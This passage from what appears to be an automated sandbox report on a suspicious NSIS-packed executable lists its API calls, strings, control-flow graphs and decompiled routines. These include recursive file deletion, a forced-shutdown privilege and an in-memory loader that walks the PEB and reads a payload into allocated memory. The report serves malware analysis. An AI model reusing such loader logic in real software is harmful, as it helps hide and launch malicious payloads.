                  • DeleteFileA.KERNELBASE(1033), ref: 00403398
                  • OleUninitialize.OLE32(00000000), ref: 00403416
                  • ExitProcess.KERNEL32 ref: 00403436
                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000000,00000000), ref: 00403442
                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000000,00000000), ref: 0040344E
                  • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                  • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\kVijllv0Yl.exe,0041F050,00000001), ref: 004034BF
                  • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                  • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                  • ExitProcess.KERNEL32 ref: 004035A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                  • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\kVijllv0Yl.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\kVijllv0Yl.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                  • API String ID: 2278157092-2453130239
                  • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                  • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                  • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                  • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004053AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 256 4053f2-4053f6 254->256 257 40551d-405523 254->257 263 405419-40541a call 4055bf 255->263 264 40540c-405417 lstrcatA 255->264 256->255 256->257 257->253 259 405525-405528 257->259 261 405532-40553a call 405d7c 259->261 262 40552a-405530 259->262 261->253 272 40553c-405551 call 405578 call 40573d RemoveDirectoryA 261->272 262->253 267 40541f-405422 263->267 264->267 268 405424-40542b 267->268 269 40542d-405433 lstrcatA 267->269 268->269 271 405438-405456 lstrlenA FindFirstFileA 268->271 269->271 273 405513-405517 271->273 274 40545c-405473 call 4055a3 271->274 284 405553-405557 272->284 285 40556a-40556d call 404e23 272->285 273->257 276 405519 273->276 281 405475-405479 274->281 282 40547e-405481 274->282 276->257 281->282 286 40547b 281->286 287 405483-405488 282->287 288 405494-4054a2 call 405a85 282->288 284->262 289 405559-405568 call 404e23 call 4057d3 284->289 285->253 286->282 291 4054f2-405504 FindNextFileA 287->291 292 40548a-40548c 287->292 298 4054a4-4054ac 288->298 299 4054b9-4054c8 call 40573d DeleteFileA 288->299 289->253 291->274 296 40550a-40550d FindClose 291->296 292->288 297 40548e-405492 292->297 296->273 297->288 297->291 298->291 301 4054ae-4054b7 call 4053aa 298->301 308 4054ea-4054ed call 404e23 299->308 309 4054ca-4054ce 299->309 301->291 308->291 311 4054d0-4054e0 call 404e23 call 4057d3 309->311 312 4054e2-4054e8 309->312 311->291 312->291
                  C-Code - Quality: 94%
                  			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                  0x004053b5
                  0x004053b9
                  0x004053c2
                  0x004053c5
                  0x004053c8
                  0x004053d0
                  0x004053d2
                  0x004053d3
                  0x00000000
                  0x004053d3
                  0x004053e2
                  0x004053e2
                  0x004053e5
                  0x004053e8
                  0x004053fc
                  0x00405403
                  0x00405408
                  0x0040540a
                  0x0040541a
                  0x0040540c
                  0x00405412
                  0x00405412
                  0x0040541f
                  0x00405422
                  0x0040542d
                  0x00405433
                  0x00405438
                  0x00405448
                  0x0040544a
                  0x00405450
                  0x00405453
                  0x00405456
                  0x00405513
                  0x00405513
                  0x00405517
                  0x00405519
                  0x00405519
                  0x00405519
                  0x00405519
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040545c
                  0x0040545c
                  0x00405465
                  0x0040546b
                  0x00405470
                  0x00405473
                  0x00405475
                  0x00405479
                  0x0040547b
                  0x0040547b
                  0x00405479
                  0x0040547e
                  0x00405481
                  0x00405494
                  0x00405496
                  0x0040549b
                  0x004054a2
                  0x004054ba
                  0x004054c0
                  0x004054c6
                  0x004054c8
                  0x004054ed
                  0x004054ca
                  0x004054ca
                  0x004054ce
                  0x004054e2
                  0x004054d0
                  0x004054d3
                  0x004054d8
                  0x004054da
                  0x004054db
                  0x004054db
                  0x004054ce
                  0x004054a4
                  0x004054aa
                  0x004054ac
                  0x004054b2
                  0x004054b2
                  0x004054ac
                  0x00000000
                  0x004054a2
                  0x00405483
                  0x00405486
                  0x00405488
                  0x00000000
                  0x00000000
                  0x0040548a
                  0x0040548c
                  0x00000000
                  0x00000000
                  0x0040548e
                  0x00405492
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004054f2
                  0x004054fc
                  0x00405502
                  0x00405502
                  0x0040550d
                  0x00000000
                  0x0040550d
                  0x00405424
                  0x0040542b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004053ea
                  0x004053ea
                  0x004053ec
                  0x0040551d
                  0x00405520
                  0x00405523
                  0x00405575
                  0x00405575
                  0x00405575
                  0x00405525
                  0x00405528
                  0x00405533
                  0x00405538
                  0x0040553a
                  0x00000000
                  0x00000000
                  0x0040553d
                  0x00405543
                  0x00405549
                  0x0040554f
                  0x00405551
                  0x00000000
                  0x0040556d
                  0x00405553
                  0x00405557
                  0x00000000
                  0x00000000
                  0x0040555c
                  0x00405561
                  0x00405562
                  0x00000000
                  0x00405563
                  0x0040552a
                  0x0040552a
                  0x00000000
                  0x0040552a
                  0x004053f2
                  0x004053f6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004053f6

                  APIs
                  • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 004053C8
                  • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 00405412
                  • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 00405433
                  • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 00405439
                  • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 0040544A
                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                  • FindClose.KERNEL32(?), ref: 0040550D
                  Strings
                  • "C:\Users\user\Desktop\kVijllv0Yl.exe" , xrefs: 004053B4
                  • \*.*, xrefs: 0040540C
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                  • API String ID: 2035342205-1053051898
                  • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                  • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                  • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                  • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021B0402 Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 447 21b0402-21b04e6 GetPEB call 21b0776 * 7 call 21b0744 CreateFileW 464 21b04ec-21b04f7 447->464 465 21b05c6 447->465 464->465 470 21b04fd-21b050d VirtualAlloc 464->470 466 21b05c8-21b05cd 465->466 468 21b05cf 466->468 469 21b05d3-21b05d8 466->469 468->469 474 21b05f4-21b05f7 469->474 470->465 471 21b0513-21b0522 ReadFile 470->471 471->465 473 21b0528-21b0547 VirtualAlloc 471->473 477 21b0549-21b055e call 21b06db 473->477 478 21b05c2-21b05c4 473->478 475 21b05da-21b05de 474->475 476 21b05f9-21b05fe 474->476 482 21b05ea-21b05ec 475->482 483 21b05e0-21b05e8 475->483 479 21b060b-21b0613 476->479 480 21b0600-21b0608 VirtualFree 476->480 487 21b0560-21b056b 477->487 488 21b0597-21b05a8 call 21b0776 477->488 478->466 480->479 485 21b05ee-21b05f1 482->485 486 21b05f3 482->486 483->474 485->474 486->474 489 21b056e-21b0595 call 21b06db 487->489 488->466 494 21b05aa-21b05af 488->494 489->488 495 21b05b1-21b05b2 FindCloseChangeNotification 494->495 496 21b05b5-21b05c0 VirtualFree 494->496 495->496 496->474
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021B04DC
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021B0506
                  • ReadFile.KERNELBASE(00000000,00000000,021B0248,?,00000000), ref: 021B051D
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 021B053F
                  • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021B019C,7FDFFF66), ref: 021B05B2
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 021B05BD
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021B019C), ref: 021B0608
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                  • String ID:
                  • API String ID: 656311269-0
                  • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                  • Instruction ID: 39427fcadce8d828dbd2868184c4cd17aab02708d5b0d282499a48f58dbd9f46
                  • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                  • Instruction Fuzzy Hash: 9C617B31E80218AFCB22DBB4C884BEFB7B6AF48750F148159E515EB690EB349E01CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 671 40604c-406051 672 4060c2-4060e0 671->672 673 406053-406082 671->673 676 4066b8-4066cd 672->676 674 406084-406087 673->674 675 406089-40608d 673->675 677 406099-40609c 674->677 678 406095 675->678 679 40608f-406093 675->679 680 4066e7-4066fd 676->680 681 4066cf-4066e5 676->681 682 4060ba-4060bd 677->682 683 40609e-4060a7 677->683 678->677 679->677 684 406700-406707 680->684 681->684 687 40628f-4062ad 682->687 685 4060a9 683->685 686 4060ac-4060b8 683->686 688 406709-40670d 684->688 689 40672e-40673a 684->689 685->686 692 406122-406150 686->692 690 4062c5-4062d7 687->690 691 4062af-4062c3 687->691 693 406713-40672b 688->693 694 4068bc-4068c6 688->694 698 405ed0-405ed9 689->698 696 4062da-4062e4 690->696 691->696 699 406152-40616a 692->699 700 40616c-406186 692->700 693->689 697 4068d2-4068e5 694->697 703 4062e6 696->703 704 406287-40628d 696->704 702 4068ea-4068ee 697->702 705 4068e7 698->705 706 405edf 698->706 701 406189-406193 699->701 700->701 708 406199 701->708 709 40610a-406110 701->709 725 40626c-406284 703->725 726 40686e-406878 703->726 704->687 707 40622b-406235 704->707 705->702 711 405ee6-405eea 706->711 712 406026-406047 706->712 713 405f8b-405f8f 706->713 714 405ffb-405fff 706->714 721 40687a-406884 707->721 722 40623b-406404 707->722 731 406856-406860 708->731 732 4060ef-406107 708->732 723 4061c3-4061c9 709->723 724 406116-40611c 709->724 711->697 718 405ef0-405efd 711->718 712->676 716 405f95-405fae 713->716 717 40683b-406845 713->717 719 406005-406019 714->719 720 40684a-406854 714->720 727 405fb1-405fb5 716->727 717->697 718->705 730 405f03-405f49 718->730 733 40601c-406024 719->733 720->697 721->697 722->698 728 406227 723->728 729 4061cb-4061e9 723->729 724->692 724->728 725->704 726->697 727->713 735 405fb7-405fbd 727->735 728->707 736 406201-406213 729->736 737 4061eb-4061ff 729->737 738 405f71-405f73 730->738 739 405f4b-405f4f 730->739 731->697 732->709 733->712 733->714 742 405fe7-405ff9 735->742 743 405fbf-405fc6 735->743 744 406216-406220 736->744 737->744 740 405f81-405f89 738->740 741 405f75-405f7f 738->741 745 405f51-405f54 GlobalFree 739->745 746 405f5a-405f68 GlobalAlloc 739->746 740->727 741->740 741->741 742->733 747 405fd1-405fe1 GlobalAlloc 743->747 748 405fc8-405fcb GlobalFree 743->748 744->723 749 406222 744->749 745->746 746->705 750 405f6e 746->750 747->705 747->742 748->747 752 406862-40686c 749->752 753 4061a8-4061c0 749->753 750->738 752->697 753->723
                  C-Code - Quality: 98%
                  			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
